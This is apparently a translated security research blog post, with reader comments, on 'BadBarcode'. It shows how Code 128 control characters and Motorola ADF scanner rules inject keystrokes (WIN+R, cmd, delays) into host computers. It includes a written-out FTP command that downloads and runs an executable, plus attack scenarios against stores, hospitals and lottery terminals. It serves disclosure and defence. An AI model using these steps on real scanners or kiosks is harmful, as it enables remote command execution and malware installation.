Barcode attack technique (Badbarcode)

Author:数据流@伏宸安全实验室
From:http://drops.wooyun.org/tips/12183

0x00 Preface


Barcode is everywhere in our daily life, especially in supermarkets, convenience stores and logistics industry. However, is it safe? The barcode attack that @Tk described on PacSec and included in his demo video on twitter are so cool that I bought a scanner for research as well. During my research, I went through all information whether it is at home or abroad, but none covers the possible attack techniques. So here is one.

0x01 Introduction of Barcode


Barcodes are graphic identifiers used to represent a set of information by varying the widths and spacings of lines. Common barcodes are parallel lines constituted by black bars (abbreviated as bar) and white bars (abbreviated as space) that are with different reflectivity.

Here are several common types of barcode: code39, code128, code93, EAN128, EAN13 QR , etc. Most of them are one-dimensional, except for QR which is two-dimensional. This post mainly focuses on one-dimensional scanners. Code 128 is the one that is most widely used and supports most characters. Normally such attacks will exploit code 128 barcodes.

0x02 Introduction of the Scanner


Almost everyone has seen a barcode scanner in supermarkets, logistics, hospitals and lottery office. A scanner is used to read the information of a barcode. A conventional one often uses infrared ray to do that and its embedded chip outputs the result through processing. Some popular scanner brands in the world include Symbol, Honeywell and Datalogic. Amongst Symbol has been acquired by Motorola.

You’ll notice that when you pay the bill at the supermarket, the code of goods is displayed on the screen after scanning. Actually many scanners rely on keyboard for input, which means a scanner, in fact, is the equivalent of a keyboard. This is a huge risk.

0x03 Code 128 barcode


Since a scanner is a keyboard, any keyboard data can be entered by manipulating the data in barcodes. But, for example, UPC barcode only supports numbers and some may support numbers and letters, while code 128 is widely used because it supports ASCII 0-127 characters and that’s why it is called code 128. Barcode length is adjustable, which may support up to 232 characters.

Code 128 can be categorized into 3 groups:

  1. Code 128A: Standard numbers and uppercase letters, control characters, special characters
  2. Code 128B: Standard numbers and uppercase letters, lowercase letters, special characters
  3. Code 128C/EAN 128: number pair collections from [00] to [99], a total of 100, i.e., can only represent digital length of even numbers.

Code 128 consists of 4 parts: start code, data code, check code (optional) and end code.

As shown above, the barcode has different widths and spacings of parallel lines and consists of black lines (bar) and white lines (space). Based on the widths of each line, it can be interpreted as 211214. The first bar contains of two units of vertical lines, while the second space contains of one unit of vertical line, so on and so forth. Normally the first six bars and spaces are a cell. The logic code for 211214 is 11010010000, which is also the start code.

Comparison between start codes:

  • 128A 11010000100
  • 128B 11010010000
  • 128C 11010011100

All end code is always 1100011101011.

According to the aforementioned logic code 11010010000, this barcode is a code128-B barcode.

In the end, the barcode data can be obtained through analysis based on the encoding table for code128.

0x04 Control characters and the production of barcodes


According to the above code128 rule, you may write a program that can read and generate barcodes. But our purpose is to execute some operations. The simplest way is to use control characters. Control characters are non-word characters, such as carriage returns, line feeds and tab characters. In ASCII, 0-31 and 127 are control characters.

Based on the control characters table of ASCII, almost all Ctrl+? Key combinations are included, such as Ctrl+O to open a file, but this is only a local shortcut key combination which can only be used only in certain applications, for example, in a Browser and MS Word. Some of the control characters can be used in some terminals making the program jump out of the sandbox. How do we generate a barcode that makes a computer execute Ctrl+O? Since the above introduces the algorithm for code 128, it’s time to write your program. There are also many small programs that can generate barcodes on the Internet. Here I recommend a powerful barcode editor: BarTender.

After installation, click “file”-“new”-“finish” and there is a blank template.

Then click the barcode button to create your barcode and select code 128.

Use BarTender to generate a barcode. Characters can be modified and debugged at any time. When scanning the above barcode, the scanner inputs “FutureSec” and outputs Ctrl+O.

After scanning, the scanner pops up a dialog box immediately.

Almost every scanner can execute it, because code 128 is supported by many scanners.

0x05 Advanced Data Formatting


Advanced Data Formatting (ADF) is an advanced input method developed by Motorola for scanners according to the rules you set for each step to customize input data, which can also be viewed as a barcode technique that supports programming.

For instance, within a check out system, when you scan a commodity, since check out system is not able to directly process the barcode, this technique is required. Check system identifier: A12345, which has to start with an A; data type of the barcode: 12345, pure numbers, in order to be identified by the check out system, it has to be processed before input.

Here is another example:

Barcode data:

8523647122

Output data from ADF:

8523641

How to implement ADF?

There are not any Chinese materials about ADF on the Internet. And only a few appears on some English websites. However, you’ll also be confused by @TK’s introduction about ADF in his PPT because of the lack of details. Later, I found a 300-page ADF guide from Motorola.

ADF is a programming method which you may construct based on your need and it uses barcode instead of code for programming. ADF represents all rules by using barcode, such as Prefix/Suffix, Replacement and Character Input.

Use ADF to hijack data of a scanner

Before set up ADF setting for the scanner, scan the start mode first. Begin new rule.

Then the scanned barcode will be added with a rule so long as the logic of the rule is legal.

Next scan the following barcodes in order

Then save the rule

When saving the rule, all output data of the scanner will be hijacked as “TEST”. If you set ADF, your rule will be executed step by step.

How to recover it?

Clear all barcodes with rule.

0x06 Use ADF to execute commands to plant malware


Since a command will be executed by solely using control characters and ADF supports simple programming and more keys, then system commands can be easily executed by using ADF. ADF supports more keys, for example, the most useful WIN+R.

It is named GUI R in ADF. Since WIN+R is supported, cmd will be executed by using the above rule. But this is not enough, because the input is completed by system which is faster than human input. When you reach GUI R and execute “c”, ”m”, “d”, cmd is already entered before the dialog box for win+r pops up. Therefore, time delay is required. And ADF supports it, which equals to sleep() in programming.

When inputing the ADF rule, two Numeric are entered as the scanning delay, such as, 0 and 1 which represent a delay of 0.1s; 0 and 5 equal to 0.5, the default values is 1 second.

If you know these ADF barcodes, you can construct a cmd popup and use control characters to execute commands that mainly include Enter. But if you do it as described above, it even requires 10 barcodes to pop a cmd box, which means the scanner has to repeat scanning for 10 times. Here is a demo from Tencent Xuan Wu Lab:

https://twitter.com/tombkeeper/status/663730674017300480

In the video, we used a pile of barcodes and scanned them for 10 times in sequence to get a cmd. This probably relates to the model of the scanner.

If it’s like this, whether rule generation or exploitation will be troublesome. As a matter of fact, this can be optimized to combine the rules of ADF by using the scanner software-123scan from Motorola.

123scan is a very powerful scanner management software by Motorola available at its official website. This software supports multiple functions. Next part is about how to use 123scan to set up ADF.

Open it and click "Create new configuration file"->"My scanner is NOT connected”->select scanner->"Modify data"->"Program complex data modifications"->"Create a new rule”.

Click on Add action to add a rule.

All ADF rules are included, including Beep control (control the buzzer for the scanner), Replace, etc.

Set a 0.5s delay and add rules in order.

Finally, all barcodes will be combined automatically and output.

The above is the barcode payload used to execute arbitrary commands. Except the first to set factory settings and the second to clear all rules, it only requires 4 barcodes to execute any single commands. “Send All that remains” represents the original data of barcodes after setting the ADF. Here os the ADF process for the above 4 barcodes: input WIN+R->delay 0.5s->input c->input m->input d->input Carriage Return->delay 0.5s->execute contents of the barcode, and the following Send ALL that remains is the command to execute for multi-line commands. If it’s single line command, 4 barcodes will be enough and Send ALL that remains will not be required.

Use ADF to plant malware

Since cmd commands are to execute, the simplest way is to use ftp to download and execute arbitrary applications. The aforementioned Send ALL that remains can use BarTender to generate FTP commands.

ftp test«CR»a«CR»a«CR»get w.exe«CR»bye«CR»w.exe«CR»get w.exe«CR»bye«CR»w.exe«CR»

The next is our demo video that has scanned ADF settings for 4 times. Whatever the barcode executes to Send All that remains. The video shows how to use FTP commands to execute.

(Tested model: Symbol-LS4208-SR20001ZZR)

http://v.youku.com/v_show/id_XMTQ0ODY0ODg1Ng==.html?from=y1.7-1.2

Password: wooyun520

0x07 Attack Scenarios


Next is a summary of the possible attack scenarios:

1.Pay a bill

Use barcode to replace commodities; Many convenience store supports WeChat, Ali Pay Barcode. The scanner supports multiple types of barcodes and it can scan the barcodes saved in the cell phone. Some markets equip with price query terminals. Use the terminal to scan a special barcode, you’ll be able to jump out of the terminal.

2.Hospital records, testing list

Nowadays, the register at a hospital and medical records both have a barcode. Autonomous terminals in the hospital support the barcode or you may hand it to a nurse. Almost every hospital has such terminals that can generate testing list by scanning the barcode.

3.Lottery ticket

Lottery tickets have barcodes. The inspecting machine requires the barcode to identify this ticket. So it’s possible to forge or attack an inspecting machine, there are many types of lottery terminals.

4.Express list

Express lists also use barcode, normally the barcode can be code 128 or code 39. Some self-help pickup cabinets may be risky.

There are many other scenarios that I won’t list here. If it’s possible, I’ll find another chance to analyze each scenario.

0x08 Precaution measures


  1. Disable ADF function of the scanner by default.
  2. Avoid using keyboard simulation of the scanner.
  3. Set up hotkey blacklist.

0x09 Conclusion


The concept of using barcode to launch attack is raised years ago, but no one digs deep. By using SQL barcode, it’s able to launch SQL injection, XSS and overflow attack.

Whatever the device is, once part of the input can be manipulated, it is risky.

0x0A References


Tags: none

18 comments.

  1. [...] Home » 2 – Barcode attack technique (Badbarcode) 2 – Barcode attack technique (Badbarcode)By dsr122 points, 0 commentsFrom: http://en.wooyun.io/2016/01/28/Barcode-attack-technique.htmlTwitter[...]

  2. [...]– http://en.wooyun.io/2016/01/28/Barcode-attack-technique.html[...]

  3. LUIZ LUIZ

    Thanks for sharing this information. Good work.

  4. Nice work. Its now on my weekend project list : )

  5. It's so a great read. 我们可以加微信吗?

  6. [...][virustracker] has been playing around with barcodes lately, and trying to use them as a vector to gain control of the system that’s reading them. It’s a promising attack — nobody expects a takeover v[...]

  7. [...]詳見此篇:Barcode attack technique (Badbarcode)[...]

  8. [...]詳見此篇:Barcode attack technique (Badbarcode)[...]

  9. [...]Check out the full post with instructions and screenshots at: http://en.wooyun.io/2016/01/28/Barcode-attack-technique.html[...]

  10. 0x4148 0x4148

    Great post , that will be added to my todo list of the month rightnow

  11. Hello!

  12. Hello!

  13. Hello!

  14. Hello!

  15. Hello!

  16. Hello!

  17. Hello!

  18. Hello!

Add a new comment.